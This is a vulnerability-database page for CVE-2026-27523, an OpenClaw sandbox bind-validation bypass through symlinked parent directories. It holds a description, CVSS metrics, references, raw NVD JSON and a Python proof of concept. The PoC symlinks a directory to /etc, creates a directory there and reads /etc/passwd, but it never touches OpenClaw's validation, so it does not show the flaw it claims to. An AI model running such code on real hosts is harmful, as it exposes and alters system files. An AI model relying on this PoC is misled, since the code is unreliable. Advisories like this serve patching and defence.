CVE-2026-27523

Description

OpenClaw versions prior to 2026.2.24 contain a sandbox bind validation vulnerability allowing attackers to bypass allowed-root and blocked-path checks via symlinked parent directories with non-existent leaf paths. Attackers can craft bind source paths that appear within allowed roots but resolve outside sandbox boundaries once missing leaf components are created, weakening bind-source isolation enforcement.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE

OpenClaw < 2026.2.24

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-27523 PoC - OpenClaw Sandbox Bind Validation Bypass
# Author: VulnCheck

import os
import subprocess
import tempfile

def create_symlink_attack():
    """
    Create symlink attack to bypass sandbox bind validation
    """
    # Step 1: Create a symlink pointing outside the allowed root
    # attacker-controlled-dir -> /etc (outside sandbox)
    symlink_path = "/allowed/root/attacker-controlled-dir"
    target_path = "/etc"
    
    if os.path.exists(os.path.dirname(symlink_path)):
        if os.path.islink(symlink_path):
            os.remove(symlink_path)
        os.symlink(target_path, symlink_path)
        print(f"[+] Created symlink: {symlink_path} -> {target_path}")
    
    # Step 2: Create bind mount with non-existent leaf path
    # Path appears to be within allowed root during validation
    # /allowed/root/attacker-controlled-dir/missing-leaf
    fake_path = "/allowed/root/attacker-controlled-dir/missing-leaf"
    
    # Step 3: After validation, create the missing leaf component
    # This triggers symlink resolution, exposing /etc
    try:
        os.makedirs(fake_path, exist_ok=True)
        print(f"[+] Created missing leaf path: {fake_path}")
        print("[*] Symlink resolved, /etc is now accessible within sandbox")
    except Exception as e:
        print(f"[-] Error: {e}")

def verify_bypass():
    """
    Verify the sandbox bypass was successful
    """
    test_file = "/allowed/root/attacker-controlled-dir/passwd"
    if os.path.exists(test_file):
        print(f"[+] Bypass successful! Can access: {test_file}")
        try:
            with open(test_file, 'r') as f:
                print(f"[+] Content preview: {f.read(100)}...")
        except:
            pass

if __name__ == "__main__":
    print("CVE-2026-27523 OpenClaw Sandbox Bind Validation Bypass PoC")
    print("=" * 60)
    create_symlink_attack()
    verify_bypass()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27523
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27523
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27523/
[4] VulDB https://vuldb.com/cve/CVE-2026-27523
[5] https://github.com/openclaw/openclaw/commit/b5787e4abba0dcc6baf09051099f6773c1679ec1
[6] https://github.com/openclaw/openclaw/security/advisories/GHSA-m8v2-6wwh-r4gc
[7] https://www.vulncheck.com/advisories/openclaw-sandbox-bind-validation-bypass-via-symlink-parent-missing-leaf-paths

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27523", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:23.420", "lastModified": "2026-03-18T20:04:53.963", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.24 contain a sandbox bind validation vulnerability allowing attackers to bypass allowed-root and blocked-path checks via symlinked parent directories with non-existent leaf paths. Attackers can craft bind source paths that appear within allowed roots but resolve outside sandbox boundaries once missing leaf components are created, weakening bind-source isolation enforcement."}, {"lang": "es", "value": "Versiones de OpenClaw anteriores a 2026.2.24 contienen una vulnerabilidad de validación de enlace (bind) de sandbox que permite a los atacantes eludir las comprobaciones de raíces permitidas (allowed-root) y rutas bloqueadas (blocked-path) a través de directorios padre con enlaces simbólicos (symlinked parent directories) con rutas hoja (leaf paths) inexistentes. Los atacantes pueden crear rutas de origen de enlace (bind source paths) que parecen estar dentro de raíces permitidas pero se resuelven fuera de los límites del sandbox una vez que se crean los componentes hoja (leaf components) que faltan, debilitando la aplicación del aislamiento de origen de enlace (bind-source isolation enforcement)."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.24", "matchCriteriaId": "673E4DE2-44C4-485D-8BDF-6DEEB32C1A98"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/b5787e4abba0dcc6baf09051099f6773c1679ec1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m8v2-6wwh-r4gc", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-sandbox-bind-validation-bypass-via-symlink-parent-missing-leaf-paths", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}